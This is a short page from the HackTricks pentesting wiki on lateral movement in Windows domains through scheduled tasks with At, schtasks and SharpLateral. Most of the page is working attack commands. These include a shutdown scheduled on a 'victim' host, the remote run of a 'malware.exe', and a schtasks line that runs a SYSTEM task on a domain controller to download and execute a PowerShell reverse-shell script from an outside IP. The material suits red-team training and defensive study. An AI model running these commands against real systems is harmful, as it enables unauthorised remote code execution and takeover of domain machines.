hacktricks/windows-hardening/ntlm/atexec.md
Carlos Polop d1647fc7c2 b
2024-07-19 11:06:54 +02:00

3.3 KiB

AtExec / SchtasksExec

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

How Does it works

At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.

At \\victim 11:00:00PM shutdown -r

Using schtasks you need first to create the task and then call it:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

{% endcode %}

You can also use SharpLateral:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

More information about the use of schtasks with silver tickets here.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}